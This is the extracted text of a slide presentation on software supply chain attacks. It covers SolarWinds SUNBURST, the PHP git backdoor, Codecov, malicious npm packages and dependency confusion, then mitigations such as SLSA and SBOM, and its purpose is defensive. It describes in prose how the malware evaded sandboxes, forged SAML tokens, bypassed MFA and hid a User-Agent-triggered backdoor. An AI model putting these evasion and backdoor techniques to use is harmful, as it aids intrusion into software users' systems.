2. The SolarWinds Compromise
On Dec. 13, the cyber community became aware of one of the most
significant cybersecurity events of our time, impacting both commercial
and government organizations around the world.
The event was a supply chain attack on SolarWinds OrionⓇ software
conducted by suspected nation-state operators (discovered by
FireEye)
3. Events Timeline
While ‘SUNBURST’ activity was only identified in December 2020, analysis of
campaign details and further analysis of SolarWinds software indicates the
event may have started,at least in preparatory phases, over a year prior:
4. SolarWinds Background
• A software company that primarily deals with systems management
solutions used by IT Network admins, Operations and Infrastructure
teams
• The most widely deployed SolarWinds product used to be Orion, a
‘Network Management System’ (NMS), which used to monitor and
manage servers, endpoints, network devices etc.
• SolarWinds Orion was utilized widely and globally, as high as within
the US ‘Department of Defense’ (DoD)
5. • The attack was a supply-chain based attack, in which an adversary has
leveraged the software’s update mechanism. The compromise has
been linked to the US ‘Treasury Department’ and the FireEye
compromises and was used to inject the ‘SUNBURST' malware /
backdoor into the code
• When the SolarWinds Orion agent was used, it interrogated systems
for communication lines status, which let admins take manual or
automated actions with elevated credentials, that were configured by
teams with no security or risk-awareness in mind. As such, those
were considered 'juicy' targets for hackers
6.
7. NMS Are Prime Targets for Attackers
• NMS are able to communicate with all devices that are managed /
monitored
• The Orion agent can manually or automatically be used to run
commands such as Cisco shutdown / restart, by using the SNMP /
WMI protocols
• Many NMS are configured to both monitor events and respond to
them, meaning that any changes the NMS can make, attackers can
too – why have we given away so much power to these tools
8. SolarWinds Digital Signature – A Piece of
Software With A Backdoor
• The malware was deployed as an update
from SolarWinds' own servers and was
digitally-signed by a valid digital certificate
bearing their name (issued by Symantec),
which strongly points to a supply chain
attack
9. The SolarWinds Attack Framework
• Delayed Execution - The ‘SUNBURST' malware checks the filesystem timestamps to ensure that the product
has been deployedfor a dormant period of 12-14 daysprior to the current time, before sending its first
beacon
• An Anti-Sandbox Behavior - Unless the infected device is joined to a domain,the malware will not execute
• DNS Resolution& IP AddressCheck - If the malware resolves a domainto a private IP address, the malware
will not execute
• VMware - Command Injection Vulnerability (CVE-2020-4006) - exists in five VMware software products
focused on identityand access management
• MS / SAML - The attackershave exfiltratedSAML token signing certificates that allow them to forge tokens
and access any resources trusted by those certificates
• MFA Bypass - SAML token-forging attack, attacker targeted the “integrationsecret key” used to connect
Cisco’s Duo Multi-FactorAuthentication (MFA)solutionto an Outlook Web Access server
10. Recommendations
• Security teams must first review the usage of NMS systems, prior to
their usage and educate on risk-awareness accordingly
• Implementation of the ‘Security, Orchestration, Automation and
Response’ (SOAR) framework should be considered
• To limit the ‘Attack Surface’, A 'Zero-Trust' network approach should
be used (block access from the NMS to the internet and if explicitly
needed, limit the destinations)
• A ‘Threat-Modeling’ session should be performed on known risks and
the question that should be raised is: “Whether the functionality that
would come out of a service, outweighs the risk, or vice versa”
11. Initiate a ‘Threat Hunt' in your network:
• Always prioritize the 'Discovery Coarse of Action’ looking backwards
over the 'Detection CoA’, looking forward
• The attackers are clearly ‘OPSec'-aware and will likely have changed
any filesystem-based ‘Indicators of Compromise’ (IoCs), because the
attacker is performing counter-intelligence, IoCs that can be used for
the ‘Discovery CoA’ are most useful
• Attackers will be re-tooling, so do not anticipate finding specifics for
the ‘SUNBURST’ malware
12. • FireEye noted that the malicious code did not overlap with other
malware
• Other branded NMS services may as well be configured by
Operations / IT teams, which are prioritized for availability and may
lack Security in mind
• Security teams would do a ‘Threat Modeling' session for the access
that a compromise to an NMS would provide
• Monitor for intrusions – log everything and more, alert on events
and investigate accordingly
13. • Since supplychain compromises are extremelydifficult to protect against,it highlights the need to for security to be considered as
part of the vendorselection process
• Supplychain security compromises extend to SaaSapplications – your SaaSvendors do not haveany magic process that make it
easier for them to detect such threats
• Supplychain attacks mayinfluence the victims' IPO and due-diligence efforts
• State-backed attacks are financed bycountries,which budgets are nowhere near the amount ofbudget private securityfirms have
at their disposals,combined – thus we must support the global securitycommunities and share everythingwe know and may have
suffered
Thanks to:
Jake Williams @ ‘Rendition Infosec’, (rsec.us), @MalwareJake
FireEye
PaloAlto Networks
Bleeping Computer
DomainTools
14. Open-Source Code Compromises
More than 90% of organizations utilize open-source code lately (Gartner)
The means of obtaining the code have changed:
• In the past – Projects from RedHat, Apache, Intel, IBM etc.
• At present - Bitbucket, Github and Gitlab are widely-used to develop and share
code
• There is no responsible entity to review the open-source code to confirm if it is
clean / non-malicious
• Application Security solutions are focused on detecting vulnerabilities, but they
do not detect attackers in code packages
15. The Official PHP Git server Was Targeted In An
Attempt To Inject Malware Within The Code Base
• The official PHP Git server has been compromised in a potential
attempt to plant malware in the code base of the PHP project
• The PHP programming language developer and maintainer Nikita
Popov said that two malicious commits were added to the ‘php-src’
repository in both his name and that of PHP creator Rasmus Lerdorf
• As noted by Bleeping Computer, the code appears to be designed to
implant a backdoor and create a scenario in which ‘Remote Code
Execution’ (RCE) may be possible
16. • The malicious commits, which appeared to be signed off under the names
of Popov and Lerdorf (1,2),were masked as simple typographical errors
that needed to be resolved
• However, instead of escaping detection by appearing so benign,
contributors that took a closer look at the "Fix typo" commits noted
malicious code that triggered arbitrary code within the header
‘HTTP_USER_AGENT’ if a string began with content related to ‘Zerodium’
17. Namespace Shadowing - Dependency Confusion
A 'White-Hat' (an ethical hacker), who breached into the Python Artifactory server
(JFrog) for alerting purposes and has managed to guess a true dependency package
name, then:
• Uploaded his own renamed package, using the true legitimate package name,
with a higher version number that follow, than the legitimate package’s initial
version
• He managed to inject his dependency package into MS .NET, Apple, Tesla etc. – all
that, with no issues whatsoever on the true developers' side and having the most
modern security defense mechanisms
After paying the ethical hacker for a 'Bug-Bounty', he admitted to the payer and
proved that his own theory worked
19. The Codecov Compromise - Hundreds of
Networks Reportedly Breached
A cyberattackagainstCodecovtookplace aroundJanuary 31, 2021, and wasonlymade publiconApril 15. The organization, whichprovidescode coverageandtestingtools, saidthat
a 'threat actor' tamperedwiththe Bashuploaderscript,therebycompromisingthe Codecov-actionsuploaderforGitHub, Codecov CircleCl Orb, andthe CodecovBitriseStep.
Thisenabledattackerstoexportdatacontainedinusercontinuousintegration(CI) environments.
The companylearned,thatforovertwo months, Codecov’sBashUploaderscriptsusedbyhundredsorthousandsof theircustomershadbeenalteredwithamaliciousline of code
that exfiltratedinformationinthe environmentvariablespresentonthe users’CI/CDenvironmentstoanattacker’sIPaddress.
Bash Uploaderexfiltratedenvironmentvariablestoattacker’sIPaddress
The flaw originateddue toanerror inthe Docker image creationprocess,which, accordingtoCodecov,“allowedthe actortoextractthe credential requiredtomodifyourBash
Uploaderscript.”
Codecovprovidescode coverage, testing, andstatstoover29,000 companies, andevenhasahandyGitHub appto integrate the tool rightwithinyouropen-source software project.
The securityadvisoryreleasedbyCodecov stronglyadviseduserstoresetall of theircredentials, tokens, orkeysthatwere presentinthe environmentvariablesintheirCIprocesses
that usedCodecov uploaders
Hundredsof clientswere potentiallyimpacted,andnow, Rapid7hasconfirmedtheywereone of them.
Rapid7says the Bash uploaderwasusedinalimitedfashionasitwasonlysetupon a single CIserverusedtotestand buildtoolinginternallyforthe ManagedDetectionand
Response (MDR) service.
Assuch, the attackerwas keptawayfromtheirproductcode, buttheywere able toaccess a "small subsetof source code repositories" forMDR, internal credentials-- all of which
have now beenrotated-- andalert-relateddataforsome MDR customers.
20. Click to add text
Although the initial
compromise seemed limited
to Codecov’s Bash Uploader,
the scope of this breach was
found to have expanded
well beyond just that, when
U.S. federal investigators
hinted at hundredsof client
networks having been
breached by hackers as they
managed to collect
customer credentialsusing
the taintedBash Uploader
tool.
HashiCorp disclosed that
their GPG private key used
to sign and validate
software packages had been
exposed as a result of this
incident.
21. NPM Package – “Discord.dll”
“Discord.dll”: Successor to NPM "fallguys" malware went undetected for 5 months
'SonaType Security Research' team has identified a series of counterfeit components in the
NPM ecosystem:
• A "fallguys" group attacker has written a malicious Python library and has used the
Discord gaming community's chat platform to steal SSH keys
• Such intentionally malicious packages seem to be doing similar, shady things to the
malicious "fallguys" NPM package discovered in September 2020 (stolen web browser
files and Discord gaming chats)
• The new packages in question were published by the same NPM author, whose NPM
account also contained what looked like legitimate packages with genuine use cases
22. Infected Discord files:
• Discord.dll, Discord.app
etc.
The attackercollected
sensitive data then sent
the data to the attackers
via the Discord platform
Thanks to Sonatype Security
23. The Octopus Scanner
• Targeted Java
developers
• Infects the
development
environment
• Injects itself
into complied
software
24. The maliciouscode takes over the ‘clean’ developer'senvironment.Any additionalcode the developer
creates afterwards, gets injected with the same maliciouscode.
• As a dependencycontributor – yourinfected code gets unwillingly andunknowinglywidespreadto the
masses
Thanks to Security Lab
25. North Korea Targeting Security Researchers
North Korea has decided the best way to reach her favorite targets is to
gain access to software supply chain.
• Several cyber security researchers were manipulated to assist the
North Korean cyber security researchers.
• Selected code that belongs to the ‘good guys’ was poisoned and has
allowed access to their computers, their code, their secrets and zero-
day information.
26. NPM Package – "event-stream"
• A user named '@right9ctrl' has asked and eventually was granted permissions
• He added a new dependency to the project
• The new dependency contained malicious code
A known NPM package named 'event-stream@3.3.6', which was not maintained by its
initial contributor any longer, was handed over to another contributor:
• The offender contributor intentionally added a piece of code that scanned and parsed
the host computer's clipboard contents, trying to locate Bitcoin wallet addresses.
When it was discovered, the first contributor has denied any ties to the code's history
progress. He added that whoever decided to use the code, should be blaming themselves.
27. Supply Chain Attacks Are Difficult To Be Detected
By Current Code Security Solutions
• The current security systems are designed to detect bugs that lead to
vulnerabilities
• They are based on static analysis – ineffective in the detection of
malicious behavior
• Longer mean time to detect (MTTD) – due to manual research
28. Current Available Solutions and Work-In-
Progress
The US President has recently signed a presidential act that would deal with
the software supply chain subject - 'Software Bill of Material' (which already
exists for some time), that would lead to transparency and order:
• Who is the code supplier and details about his reputation history
• The code history and processes it went through so far
• How was the code reviewed / what are the used libraries, classes etc.
US organizations heavily push forward to this new initiative, as most of their
critical systems are vulnerable to supply chain attacks.
29. Detecting Supply-Chain Attacks In Code Packages
• A Platform for Code Packages Behavioral Analysis & Detection of
Open-source Software Supply-Chain Attacks
Thanks to Tzachi Zorn, Co-Founder & CEO @ ‘Dustico’
Dustico - https://dusti.co/
30. ‘SLSA’ - A Mitigation Solution by Google
SLSA (pronounced "salsa") is an End-to-End Framework for Supply Chain Integrity:
The proposed solution is ‘Supply chain Levels for Software Artifacts’ (SLSA), an end-to-end
framework for ensuring the integrity of software artifacts throughout the software supply
chain:
• It is inspired by Google’s internal “Binary Authorization for Borg” which has been in use
for the past 8+ years and is mandatory for all of Google's production workloads
• The goal of SLSA is to improve the state of the industry, particularly open source, to
defend against the most pressing integrity threats
• With SLSA, consumers can make informed choices about the security posture of the
software they consume
31. How SLSA Might Help
SLSA helps to protect against common supply chain attacks. The
following image illustrates a typical software supply chain and includes
examples of attacks that can occur at every link in the chain.
Each type of attack has occurred over the past several years and,
unfortunately, is increasing as time goes on -
32.
33. Threat Known example How SLSA could have helped
A Submit bad code to the sourcerepository Linux hypocrite commits: Researcher attempted to
intentionally introducevulnerabilitiesinto the Linux
kernel via patches on the mailinglist.
Two-person review caught most, but not all,of the
vulnerabilities.
B Compromise sourcecontrol platform PHP: Attacker compromised PHP’s self-hosted gitserver
and injected two maliciouscommits.
A better-protected sourcecode platformwould have
been a much harder target for the attackers.
C Build with official process butfromcode not matching sourcecontrol Webmin: Attacker modified the build infrastructureto
use sourcefiles notmatching sourcecontrol.
A SLSA-compliantbuild server would have produced
provenance identifyingthe actual sources used,allowing
consumers to detect such tampering.
D Compromise build platform SolarWinds:Attacker compromised the build platform
and installed an implantthatinjected malicious behavior
duringeach build.
Higher SLSA levels requirestronger security controls for
the build platform,makingitmore difficultto
compromiseand gain persistence.
E Use bad dependency (i.e. A-H, recursively) event-stream: Attacker added an innocuous dependency
and then updated the dependency to add malicious
behavior.The update did not match the code submitted
to GitHub (i.e. attack F).
ApplyingSLSA recursively to all dependencies would
have prevented this particular vector,becausethe
provenance would have indicated that iteither wasn’t
builtfrom a proper builder or that the sourcedid not
come from GitHub.
F Upload an artifactthatwas not builtby the CI/CD system CodeCov: Attacker used leaked credentials to upload a
maliciousartifactto a GCS bucket, from which users
download directly.
Provenance of the artifactin the GCS bucket would have
shown that the artifactwas not builtin the expected
manner from the expected sourcerepo.
G Compromise packagerepository Attacks on PackageMirrors:Researcher ran mirrors for
several popular packagerepositories,which could have
been used to serve malicious packages.
Similar to above(F), provenance of the malicious
artifacts would haveshown that they were not builtas
expected or from the expected sourcerepo.
H Trick consumer into usingbad package Browserify typosquatting: Attacker uploaded a malicious
packagewith a similarnameas the original.
SLSA does not directly address this threat,but
provenance linkingback to sourcecontrol can enable
and enhance other solutions.
34. SLSA URL:
https://security.googleblog.com/2021/06/introducing-slsa-end-to-end-framework.html
SLSA is a practical framework for end-to-end software supply chain
integrity, based on a model proven to work at scale in one of the
world’s largest software engineering organizations. Achieving the
highest level of SLSA for most projects may be difficult, but incremental
improvements recognized by lower SLSA levels will already go a long
way toward improving the security of the open-source ecosystem.
Thanks to Patrick Mathieu, Sr. Manager, Offensive Security @ LogMeIn
35. Additional Security-Related ”Don’t Say You
Were Not Warned...”
• 80% of companies that pay a Ransomeware ransom are exploited
again - with about 1/2 of them believing it was the same group in the
subsequent attack. Is that enough proof that paying a ransom is not a
good strategy? If your security controls weren't good enough to stop
the ransomware, they definitely aren't good enough to detect a root
kit - https://www.zdnet.com/article/most-firms-face-second-
ransomware-attack-after-paying-off-first/#ftag=RSSbaffb68
Thanks to Michael Fischer, Sr. Manager, Product Security @ LogMeIn
36. 7 Cybersecurity Breaches In 2020 & How They
Could Have Been Prevented
1. Solarwinds: Third Party Infiltration (covered above)
2. Portnox: Network Penetration
3. Pulse Secure: VPN Vulnerabilities
4. Marriot: Fraudulent Login from Stolen Details
5. Cisco: Disgruntled Former Employee
6. University of California: Ransomware
7. UN Maritime Agency: Possible Watering Hole Attack
URL: https://cyolo.io/blog/7-data-cybersecurity-breaches-in-2020-how-they-
could-have-been-prevented/
37. And Last, But Not Least – Shirbit Insurance
Israel Shaken By Data Leak After Ransomware Attack At ‘Shirbit Insurance’ Company:
• Hackers leak screenshot of negotiationwith breached insurance giant
• Israeli government reportedly reconsidering relationship withinsurance firm following security breach
A hacking gang calling itself Black Shadow has demandeda giant insurance firm pay a US $3.8 millionransom
after encrypting and stealing sensitive dataand documentsabout its clients.
Customers of the victim, Israel’s Shirbit insurance company, havebeen advised to consider obtainingnew
identitycards and driving licenses due to the risk of identitytheft after the hackers released a third wave of
stolen data this past weekend.
Leaked data has includedscans of identitycards, marriage certificates, and financialand medical documents.
URL: https://hotforsecurity.bitdefender.com/blog/israel-shaken-by-data-leak-after-ransomware-attack-at-
shirbit-insurance-company-24786.html
40. The SolarWinds Compromise
On Dec. 13, the cyber community became aware of one of the mostsignificant cybersecurity events
of our time, impacting both commercial and government organizations around the world. The event
was a supply chain attack on SolarWinds OrionⓇ software conducted by suspected nation-state
operators (discovered by FireEye):
• SolarWinds has mentioned that a vulnerability which existed until the March-June 2020
timeframe, was leveraged to take advantageof their 'Orion' software product
• Evidence existand shows the attackers’ ‘Command and Control’(C2) infrastructure was set up as
early as August 2019. The first modified SolarWinds software was released in October 2019, and
the earliest related Cobalt Strike identified payload was generated using Cobalt Strike 4.0, which
was built in December 2019
More On NMS
• Even when NMS are configured to only monitor (read-only), the credentials used would still offer
some level of access to an attacker (read configurations, list processes etc.)
• In a situation that an attacker compromises NMS, he could usually reshape network traffic for
man-in-the-middle (MitM) / person-in-the-middle / monkey-in-the-middle opportunities and
might then use credentials for system monitoring, to laterally move to target systems (if the
Orion NMS agent is domain-joined, other service accounts that exist there might allow an
attacker to leverage and laterally move within the environment)
41. The SolarWinds Attack Framework– Delayed Execution
• The ‘SUNBURST' malware checks the filesystem timestamps to ensure that the product has been
deployed for a dormant period of 12-14 days prior to the current time, before it sends its first
beacon:
• The sample would only execute if the filesystem write time of the assemblyis at least 12-14 days
prior to the current time (the exact threshold is selected randomly from an interval)
• The sample continues to check the time threshold, as it is run by a legitimate recurring
background task
• Once the threshold is met, the sample creates a ‘named pipe’ to act as a guard that only one
instance is running before reading the specific file
'SolarWinds.Orion.Core.BusinessLayer.dll.config'from disk and retrieving the XML field
'appSettings’
• The 'appSettings' field's keys are legitimate values that the malicious logic re-purposes as a
persistent configuration
• The key 'ReportWatcherRetry' mustbe any value other than ‘3’, for the sample to continue
execution
This delayed execution maliciously and effectively prevents the counter-measure usage of malware
sandboxes and other instrumented environments to detect it – in this case, even if a staging
environment would have been used to test out the infected update prior to its deployment to make
certain malicious activities are avoided, it would leave the sandbox environment and be rolled out
within much less than 12 days (within 18,000 customers).
42. The SolarWinds Attack Framework– Anti-Sandbox Behavior
According to FireEye, unless the infected device is joined to a domain, the malware will not execute:
• The sample checks that the machine is domain-joined then retrieves the domain name before
execution continues
• A 'userID' is generated by computing the MD5 of all network interface MAC addresses that are up
and not loopback devices, the domain name, and the registry value
'HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptographyMachineGuid’
• The 'userID' is encoded via a custom XOR scheme after the MD5 is calculated
• The 'ReportWatcherPostpone' key of 'appSettings' is then read from
‘SolarWinds.Orion.Core.BusinessLayer.dll.config'to retrieve the initial, legitimate value
• This operation is performed as the sample later bit packs flags into this field and the initial value
must be known in order to read out the bit flags
• The sample then invokes the method 'Update', which is the core event loop of the sample
43. The SolarWinds Attack Framework – VMware:
The ‘National Security Agency’ (NSA) released an advisory about CVE-
2020-4006: A command injection vulnerability, stating that Russian
state-sponsored actors were actively exploiting the vulnerability and
suggesting US Government agencies patch immediately. This
vulnerability exists in five VMware software products focused on
identity and access management. Exploitation allows attackers to
deploy a ‘web shell’ on the system and gain access to protected data.
This vulnerability can only be exploited by someone who has already
authenticated to the system and indicates that when leveraged, it likely
is used to gain additional access once the attacker is already inside the
networks. More information about CVE-2020-4006 can be found in our
previously released Threat Brief: VMware Command Injection
Vulnerability
44. The SolarWinds Attack Framework - Microsoft / SAML:
Microsoft has published multiple reports on activity related to this attack
campaign, including a summary of the backdoor implanted into SolarWinds
OrionⓇ (referred to by Microsoft as ‘Solorigate’),as well as guidance for
their customers on protecting themselves. They have publicly statedthey are
working with more than 40 companies who have been targeted in this attack
• One specific component of the attackthat Microsoft has discussed in detail
is what they have observed in compromised networks with regard to
identity infrastructure. Specifically,the attackers have exfiltrated SAML
token signing certificates, that allow them to forge tokens and access any
resources trustedby those certificates. Microsoft has observed these
forged tokens presented to the Microsoft cloud on behalf of their
customers
• The impact of a compromise of these certificatesimplies the attacker
gained the highest level of privileges inside the network and used them to
establish long-term access to the network
45. The SolarWinds Attack Framework - SUPERNOVA Web Shell:
FireEye’s initial report on the SolarWinds compromise included indicators for a
‘web shell’ they call SUPERNOVA. FireEye has removed those indicators as they no
longer believe they were used as a result of the SolarWinds software compromise.
This ‘web shell’ may not be related, but it is still vital to defend against it
The SolarWinds Attack Framework - MFA Bypass:
The SAML token-forging attack described above would allow an attacker to evade
multi-factor authentication systems, as in that case, the authentication system
itself is compromised. Volexity published a report about a threat group named Dark
Halo who they have now connectedto the SolarWinds compromise. Their report
describes that the attacker targeted the “integration secret key” used to connect
Cisco’s Duo Multi-Factor Authentication (MFA) solution to an Outlook Web Access
server. With that key, they were able to pre-computethe token codes necessary for
authentication
Similar to the SAML token-forging attack, this MFA bypass requires a significant
compromise of the systems used to authenticate users and would have been
performed post-compromiseto extend the attacker’s access to the network
46. Open Source Code Attacks - Official PHP Server Targeted:
On the PHP Git server, an attacker group has managed to gain access
and has added malicious code that caused that any PHP server with a
specific version number and onwards, with the "zerodium" word, will
run the malicious code that follows. Basically, the code checked if the
HTTP request included the header "HTTP_USER_AGENT" and began
with the word "zerodium". If so, it would inject the rest of the string as
PHP code. Eventually, the malicious code was discovered by an
occasion and was removed. However, in the eyes of infosec teams, such
a code might seem normal, but the fact that the malicious code or a
part of it was removed, does not mean a full-scale attack was over. We
cannot assume that other programming languages were not affected as
well. Attackers never stop once their attack was stopped.
47. Additional Past Supply Chain Attacks
• September 2015 – XcodeGhost: An attacker distributed a version ofApple’s Xcode software (used to build iOS and macOS
applications),which injected additional code into iOSapps built usingit.This attackresulted in thousands ofcompromised apps
identified in Apple’s app store
• March 2016 – KeRanger: Popularopen source BitTorrent client,Transmission,was compromised to include macOSransomware in
its installer.Attackers compromised the legitimate servers used to distribute Transmission,so users who downloaded and installed
the programwould be infected with malware that held their files for ransom
• June 2017 – NotPetya: Attackers compromised a Ukrainian software companyand distributed a destructive payloadwith network-
worm capabilities through an update to the “MeDoc” financial software.After infectingsystems usingthe software, the malware
spread to other hosts in the network and caused a worldwide disruption affectingmanyorganizations
• September 2017 – CCleaner: Attackers compromised Avast’s CCleanertool,used bymillions to help keep their PC working
properly.The compromise was used to target large technologyand telecommunications companies worldwide with a second-stage
payload
• In September 2019, attackers again likelytargeted Avast’s CCleaner tool after gainingaccess to Avast’s networkthrough a
temporaryVPN profile.It is not clear whether or not,the same operators from 2017 were involved in this incident
In each case, includingthe recent SolarWinds compromise, rather than targetingan organizationdirectlythrough phishingor
exploitation ofvulnerabilities,the attackers chose to compromise software developers directlyand use the trust we place in them to
access other networks.This can effectivelyevade certain prevention and detectioncontrols that have been tuned to trust well-known
programs
This pattern ofsoftware supplychain compromises will continue,and securityteams can not afford to ignore them. Protecting against
these attacks is not simple for anyenterprise, and those who are responsible for writingand deployingsoftware need to take
responsibilityforthe integrityofthat code